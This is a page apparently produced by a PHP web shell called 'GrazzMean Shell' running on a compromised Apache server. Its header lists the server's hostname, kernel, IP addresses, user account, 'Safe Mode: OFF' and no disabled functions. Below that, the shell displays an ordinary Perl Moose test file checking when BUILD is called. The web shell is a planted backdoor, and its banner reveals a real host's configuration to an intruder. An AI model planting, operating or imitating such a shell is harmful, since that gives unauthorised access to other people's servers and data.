shell bypass 403

GrazzMean Shell

: /usr/share/doc/perl-Moose/t/metaclasses/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 13.59.123.182
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : new_object_BUILD.t
use strict;
use warnings;
use Test::More;

my $called;
{
    package Foo;
    use Moose;

    sub BUILD { $called++ }
}

Foo->new;
is($called, 1, "BUILD called from ->new");
$called = 0;
Foo->meta->new_object;
is($called, 1, "BUILD called from ->meta->new_object");
Foo->new({__no_BUILD__ => 1});
is($called, 1, "BUILD not called from ->new with __no_BUILD__");
Foo->meta->new_object({__no_BUILD__ => 1});
is($called, 1, "BUILD not called from ->meta->new_object with __no_BUILD__");

done_testing;
© 2025 GrazzMean